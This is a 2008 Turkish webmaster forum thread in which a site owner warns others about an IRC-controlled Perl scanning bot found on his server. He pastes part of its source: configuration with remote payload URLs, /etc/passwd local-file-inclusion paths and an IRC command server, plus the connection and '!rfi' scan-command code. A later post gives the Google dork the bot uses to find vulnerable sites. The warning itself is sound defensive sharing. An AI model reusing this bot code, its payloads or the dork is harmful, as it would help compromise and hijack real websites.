Webmaster Forumu

Geri git   Webmaster Forumu > Webmaster Kaynak Eğitim Tanıtım Hizmet > Webmaster Genel Konular

Webmaster Genel Konular Webmaster Genel Konular

Cevapla
 
LinkBack (1) Seçenekler Stil
  1 links from elsewhere to this Post. Click to view. #1 (permalink)   iTrader 
Alt 2008-04-19, 16:06
SavaS - ait Kullanıcı Resmi (Avatar)
Member
 
Üyelik tarihi: Jun 2007
Nerden: Antalya
Mesajlar: 110
Teşekkür: 2
Thanked 0 Times in 0 Posts
Tecrübe Puanı: 1
iTrader: %0/0
SavaS is an unknown quantity at this point
Standart Dikkat, farklı bir TROJAN!

Selam,

Sitemin biri için "RSA Anti-Fraud Command Center
(afcc@rsasecurity.com)" adresinden bir mail gelmiş geçen gün. Mailde sitemin birinde bilgim dışında biri trojan scan ettiriyormuş. (Adresi vermeyeceğim güvenlik açısından.)

Bu virüs, sitemin chmodu 777 olan bir klasöre bir şekilde bulaştırılmış, perl ve php kodlarıyla yazılmış IRC üzerinden yönetilen bir oto-scan trojan/virüstür.

RSA nın belirttiği dosyanın bulunduğu klasöre baktığımda 10-20 arası dosya bulunmaktaydı. Silmeye çalıştığımda ise, bir kaçı silinmedi. Silinmeyen dosyaların birinin içinde;
Kod:
#################
#[Configuration]#
#################
my $response = "http://www.zinforma.com/arab.txt"; # included in zip as response.txt
my $test = "http://need-this.info/pretty/234/control/id2.txt"; # included in zip as test.txt
my $printcmd = "-=Hidup Hanya Sebuah Ilusi=-";
my $responselfi = "/../../../../../../../../etc/passwd";
my $printcmdlfi = "/../../../../../../../../etc/passwd";
my $spread = "http://www.teste.dark-hosting.be/mohaa/echo.txt";
my $nickname = "TDO^Scan".(int(rand(999)));
my $ident = "racrew";
my $channel = "#tondano";
my $server = "irc.racrew.us";
my $port = 6667;
#################
#[Configuration]#
#################

my $sock;
my $exploitcounter = 100;
my @User_Agent = &Agent();
my $pid = fork();
if($pid==0){
 &connectirc($nickname,$ident,$channel,$server,$port);
}else{
 exit(0);
}

sub connectirc(){
 my($nickname,$ident,$channel,$server,$port)=@_;
 $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server",PeerPort=>$port);
 $sock->autoflush(1);
 print $sock "NICK ".$nickname."\r\n";
 print $sock "USER ".$ident." 8 * : r@cRew \r\n";
 print $sock "JOIN ".$channel."\r\n";
 while( $command = <$sock> ){

if($command =~ /\!rfi\s+(.*?)\s+(.*)/){
 if(fork() == 0){
  my($bug,$dork)=($1,$2);
  &scan($bug,$dork);
   exit(0);
 }
}
Şeklinde devam eden bir kod buldum. Bu trojanın kontrolü irc.racrew.us sunucusundaki yöneticiler (mi desem artık user mi desem) tarafından yapılıyor.

Sunucuya girip nelerin olup bittiğine bakabilirsiniz.

Sunucularınızdaki güvenliği arttırmanız tavsiye edilir.

Bu arada trojanı bhlynx script yardımıyla çoğaltıyorlar sanırım.

__________________
reseller
Alıntı ile Cevapla

  #2 (permalink)   iTrader 
Alt 2008-04-19, 16:14
SavaS - ait Kullanıcı Resmi (Avatar)
Member
 
Üyelik tarihi: Jun 2007
Nerden: Antalya
Mesajlar: 110
Teşekkür: 2
Thanked 0 Times in 0 Posts
Tecrübe Puanı: 1
iTrader: %0/0
SavaS is an unknown quantity at this point
Standart

Bu arada biraz gözlem yaptımda,

sistem çok gelişmiş. Google'dan aşağıdaki aramayı yaparak açığı olanlara otomatikmen bulaşıyor.

Alıntı:
allinurl:vwar site:.com
google'da yukarıdaki kodu arasanıza karşınıza ne çıkacak
__________________
reseller
Alıntı ile Cevapla

  #3 (permalink)   iTrader 
Alt 2008-04-19, 16:26
SavaS - ait Kullanıcı Resmi (Avatar)
Member
 
Üyelik tarihi: Jun 2007
Nerden: Antalya
Mesajlar: 110
Teşekkür: 2
Thanked 0 Times in 0 Posts
Tecrübe Puanı: 1
iTrader: %0/0
SavaS is an unknown quantity at this point
Standart

Ayrıyetten, bu virüsü yayan kişi, paypal hesaplarınızı çalabiliyor, httpdflood, udpflood, tcpflood, portscan türü şeylerde yapabiliyor.

Virüsü yayan kişinin mail adresini buldum sanırım.
__________________
reseller
Alıntı ile Cevapla

  #4 (permalink)   iTrader 
Alt 2008-04-19, 17:11
SavaS - ait Kullanıcı Resmi (Avatar)
Member
 
Üyelik tarihi: Jun 2007
Nerden: Antalya
Mesajlar: 110
Teşekkür: 2
Thanked 0 Times in 0 Posts
Tecrübe Puanı: 1
iTrader: %0/0
SavaS is an unknown quantity at this point
Standart

hiçkimsenin bu konu hakkında bilgisi yok sanırım

Botu çoğaltan kişiler endonezyalılarmış.
__________________
reseller
Alıntı ile Cevapla

  #5 (permalink)   iTrader 
Alt 2008-04-19, 17:24
madeinclick.com - ait Kullanıcı Resmi (Avatar)
Member
 
Üyelik tarihi: Jan 2008
Mesajlar: 420
Teşekkür: 8
Thanked 3 Times in 3 Posts
Tecrübe Puanı: 1
iTrader: %100/2
madeinclick.com is an unknown quantity at this point
Standart

ORMAN çocukları !!
Alıntı ile Cevapla
Aşağıdaki kullanıcılar bu mesajı onaylayıp teşekkür ettiler:
TuRKuaZz (2008-06-17)

Cevapla

LinkBacks (?)
LinkBack to this Thread: http://forum.iyinet.com/webmaster-genel-konular/90480-dikkat-farkli-bir-trojan.html
Konuyu Başlatan For Type Tarih
Dikkat, farkl? bir TROJAN! This thread Refback 2008-05-25 18:47

Seçenekler
Stil

Yetkileriniz
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-KodlarıKapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık

Benzer Konular
Konu Konuyu Başlatan Forum Cevaplar Son Mesaj
Tema Explorerde Farklı Firefoxda Farklı Linux WordPress 5 2008-03-23 15:20
Yeni YouTube(sitesi) virüsüne dikkat! [Trojan-Dropper.W32/Agent.CPL] Mywedding Virus Spyware Spam 1 2007-11-14 20:27
Aynı site-aranan kelime farklı-cacheler farklı riseofthemachines Google Arama 0 2007-03-01 07:45


Bütün Zaman Ayarları WEZ +2 olarak düzenlenmiştir. Şu Anki Saat: 07:43 .


Powered by vBulletin® Version 3.7.2
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.1.0

Firefox